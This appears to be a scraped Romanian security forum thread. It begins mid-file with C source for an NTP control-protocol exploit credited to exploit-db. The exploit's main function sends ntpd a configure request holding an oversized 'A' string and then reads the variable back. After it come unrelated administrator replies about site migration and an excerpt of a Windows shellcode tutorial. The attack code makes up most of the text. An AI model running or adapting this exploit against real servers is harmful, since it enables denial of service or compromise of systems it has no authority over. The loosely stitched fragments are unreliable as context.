sk++; } authnumfreekeys += MEMINC; return (authnumfreekeys); } void MD5auth_setkey( keyid_t keyno, int keytype, const u_char *key, const int len ) { struct savekey *sk; /* * See if we already have the key. If so just stick in the * new value. */ sk = key_hash[KEYHASH(keyno)]; while (sk != NULL) { if (keyno == sk->keyid) { sk->type = keytype; sk->keylen = min(len, sizeof(sk->k.MD5_key)); #ifndef DISABLE_BUG1243_FIX memcpy(sk->k.MD5_key, key, sk->keylen); #else strncpy((char *)sk->k.MD5_key, (const char *)key, sizeof(sk->k.MD5_key)); #endif if (cache_keyid == keyno) { cache_flags = 0; cache_keyid = 0; } return; } sk = sk->next; } /* * Need to allocate new structure. Do it. */ if (0 == authnumfreekeys && !auth_moremem()) return; sk = authfreekeys; authfreekeys = sk->next; authnumfreekeys--; sk->keyid = keyno; sk->type = keytype; sk->flags = 0; sk->lifetime = 0; sk->keylen = min(len, sizeof(sk->k.MD5_key)); #ifndef DISABLE_BUG1243_FIX memcpy(sk->k.MD5_key, key, sk->keylen); #else strncpy((char *)sk->k.MD5_key, (const char *)key, sizeof(sk->k.MD5_key)); #endif sk->next = key_hash[KEYHASH(keyno)]; key_hash[KEYHASH(keyno)] = sk; #ifdef DEBUG if (debug > 1) { char hex[] = "0123456789abcdef"; int j; printf("auth_setkey: key %d type %d len %d ", sk->keyid, sk->type, sk->keylen); for (j = 0; j < sk->keylen; j++) printf("%c%c", hex[key[j] >> 4], hex[key[j] & 0xf]); printf("\n"); } #endif authnumkeys++; } /* * Types of ascii representations for keys. "Standard" means a 64 bit * hex number in NBS format, i.e. with the low order bit of each byte * a parity bit. "NTP" means a 64 bit key in NTP format, with the * high order bit of each byte a parity bit. "Ascii" means a 1-to-8 * character string whose ascii representation is used as the key. */ int authusekey( keyid_t keyno, int keytype, const u_char *str ) { const u_char *cp; int len; cp = str; len = strlen((const char *)cp); if (len == 0) return 0; MD5auth_setkey(keyno, keytype, str, (int)strlen((const char *)str)); return 1; } /* * keytype_name returns OpenSSL short name for digest by NID. * * Used by ntpq and ntpdc keytype() */ const char * keytype_name( int nid ) { static const char unknown_type[] = "(unknown key type)"; const char *name; #ifdef OPENSSL INIT_SSL(); name = OBJ_nid2sn(nid); if (NULL == name) name = unknown_type; #else /* !OPENSSL follows */ if (NID_md5 == nid) name = "MD5"; else name = unknown_type; #endif return name; } /* * getpass_keytype() -- shared between ntpq and ntpdc, only vaguely * related to the rest of ssl_init.c. */ char * getpass_keytype( int keytype ) { char pass_prompt[64 + 11 + 1]; /* 11 for " Password: " */ snprintf(pass_prompt, sizeof(pass_prompt), "%.64s Password: ", keytype_name(keytype)); return getpass(pass_prompt); } int authistrusted( keyid_t keyno ) { struct savekey *sk; if (keyno == cache_keyid) return ((cache_flags & KEY_TRUSTED) != 0); authkeyuncached++; sk = key_hash[KEYHASH(keyno)]; while (sk != 0) { if (keyno == sk->keyid) break; sk = sk->next; } if (sk == 0) { authkeynotfound++; return (0); } else if (!(sk->flags & KEY_TRUSTED)) { authkeynotfound++; return (0); } return (1); } u_long getkeyid( const char *keyprompt ) { int c; FILE *fi; char pbuf[20]; size_t i; size_t ilim; #ifndef SYS_WINNT if ((fi = fdopen(open("/dev/tty", 2), "r")) == NULL) #else if ((fi = _fdopen(open("CONIN$", _O_TEXT), "r")) == NULL) #endif /* SYS_WINNT */ fi = stdin; else setbuf(fi, (char *)NULL); fprintf(stderr, "%s", keyprompt); fflush(stderr); for (i = 0, ilim = COUNTOF(pbuf) - 1; i < ilim && (c = getc(fi)) != '\n' && c != EOF; ) pbuf[i++] = (char)c; pbuf[i] = '\0'; if (fi != stdin) fclose(fi); return (u_long) atoi(pbuf); } void warning( const char *fmt, const char *st1, const char *st2 ) { (void) fprintf(stderr, "%s: ", progname); (void) fprintf(stderr, fmt, st1, st2); (void) fprintf(stderr, ": "); perror(""); } int sendpkt( void * xdata, size_t xdatalen ) { if (debug >= 3) printf("Sending %lu octets\n", (u_long)xdatalen); sendto(sockfd,xdata,(size_t)xdatalen, 0,(struct sockaddr *)&serverAddr,addr_size); if (debug >= 4) { int first = 8; char *cdata = xdata; printf("Packet data:\n"); while (xdatalen-- > 0) { if (first-- == 0) { printf("\n"); first = 7; } printf(" %02x", *cdata++ & 0xff); } printf("\n"); } return 0; } void error(char *msg) { perror(msg); exit(0); } int main(int argc, char *argv[]) { char *cfgcmd; u_short rstatus; int rsize; const char *rdata; char *resp; int res; int col; int i; int portNum, nBytes; char buffer[1024]; /*Create UDP socket*/ sockfd = socket(PF_INET, SOCK_DGRAM, 0); /*Configure settings in address struct*/ serverAddr.sin_family = AF_INET; serverAddr.sin_port = htons(123); serverAddr.sin_addr.s_addr = inet_addr("127.0.0.1"); memset(serverAddr.sin_zero, '\0', sizeof serverAddr.sin_zero); /*Initialize size variable to be used later on*/ addr_size = sizeof serverAddr; cfgcmd = "setvar A = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; res = sendrequest(CTL_OP_CONFIGURE, 0, 1, strlen(cfgcmd), cfgcmd, &rstatus, &rsize, &rdata); sleep(5); cfgcmd = "A"; res = sendrequest(CTL_OP_READVAR, 0, 1, strlen(cfgcmd), cfgcmd, &rstatus, &rsize, &rdata); } /* * sendrequest - format and send a request packet */ int sendrequest( int opcode, int associd, int auth, int qsize, char *qdata ) { struct ntp_control qpkt; int pktsize; u_long key_id; char * pass; int maclen; /* * Check to make sure the data will fit in one packet */ if (qsize > CTL_MAX_DATA_LEN) { fprintf(stderr, "***Internal error! qsize (%d) too large\n", qsize); return 1; } /* * Fill in the packet */ qpkt.li_vn_mode = PKT_LI_VN_MODE(0, pktversion, MODE_CONTROL); qpkt.r_m_e_op = (u_char)(opcode & CTL_OP_MASK); qpkt.sequence = htons(sequence); qpkt.status = 0; qpkt.associd = htons((u_short)associd); qpkt.offset = 0; qpkt.count = htons((u_short)qsize); pktsize = CTL_HEADER_LEN; /* * If we have data, copy and pad it out to a 32-bit boundary. */ if (qsize > 0) { memcpy(qpkt.data, qdata, (size_t)qsize); pktsize += qsize; while (pktsize & (sizeof(uint32_t) - 1)) { qpkt.data[qsize++] = 0; pktsize++; } } /* * If it isn't authenticated we can just send it. Otherwise * we're going to have to think about it a little. */ if (!auth && !always_auth) { return sendpkt(&qpkt, pktsize); } /* * Pad out packet to a multiple of 8 octets to be sure * receiver can handle it. */ while (pktsize & 7) { qpkt.data[qsize++] = 0; pktsize++; } /* * Get the keyid and the password if we don't have one. */ if (info_auth_keyid == 0) { key_id = getkeyid("Keyid: "); if (key_id == 0 || key_id > NTP_MAXKEY) { fprintf(stderr, "Invalid key identifier\n"); return 1; } info_auth_keyid = key_id; } if (!authistrusted(info_auth_keyid)) { pass = getpass_keytype(info_auth_keytype); if ('\0' == pass[0]) { fprintf(stderr, "Invalid password\n"); return 1; } authusekey(info_auth_keyid, info_auth_keytype, (u_char *)pass); authtrust(info_auth_keyid, 1); } /* * Do the encryption. */ maclen = authencrypt(info_auth_keyid, (void *)&qpkt, pktsize); if (!maclen) { fprintf(stderr, "Key not found\n"); return 1; } else if ((size_t)maclen != (info_auth_hashlen + sizeof(keyid_t))) { fprintf(stderr, "%d octet MAC, %lu expected with %lu octet digest\n", maclen, (u_long)(info_auth_hashlen + sizeof(keyid_t)), (u_long)info_auth_hashlen); return 1; } return sendpkt((char *)&qpkt, pktsize + maclen); } Sursa: https://www.exploit-db.com/exploits/39445/

Poate au disparut de la problemele din trecut, nu de la migrarea la noua platforma. O sa verific cand o sa am ceva timp.

Din link pot scoate doar acel ID si titlul SEO friendly. Da, teoretic pot sa caut acel titlu dar nu am certitudinea ca gasesc ceea ce trebuie si nu am timp sa implementez asa ceva, mai ales un motor heuristic de cautare. O sa isi revina SEO dupa 2-3 luni cand site-ul va fi reindexat.

E redirectionare catre homepage, dar nu am ce face mai multe, nu mai corespund acele ID-uri...

Introduction to Windows shellcode development – Part 3 February 15, 2016 Ionut Popescu If you missed the first two parts of this article, you can find in Part I what is a shellcode, how it works and which are its limitations and in Part II you can read about the PEB (Process Environment Block) structure, the PE (.exe, .dll) file format and you can go through a short ASM introduction. You’ll need this information in order to properly understand Windows shellcodes. In this last part of the shellcode development introduction, we will write a simple “SwapMouseButton” shellcode, a shellcode that will swap left and right mouse buttons. We will start from an existing shellcode: “Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode“. The shellcode name tells us a few things, such like it uses: URLDownloadToFile Windows API function to download a file WinExec to execute the file (executable file: .exe) ExitProcess will terminate the process running the shellcode Using this example, we will call SwapMouseButton function and ExitProcess function. I’m pretty sure it is easy to understand what these functions do. BOOL WINAPI SwapMouseButton( _In_ BOOL fSwap ); VOID WINAPI ExitProcess( _In_ UINT uExitCode ); As you can see, each function has only one parameter: fSwap parameter can be TRUE or FALSE. If it is TRUE, the mouse buttons are swapped, else they are restored. uExitCode represents the process exit code. Each process must return a value on exit (zero if everything was ok, any other value otherwise). This is the “return 0” of the main function. Link: http://securitycafe.ro/2016/02/15/introduction-to-windows-shellcode-development-part-3/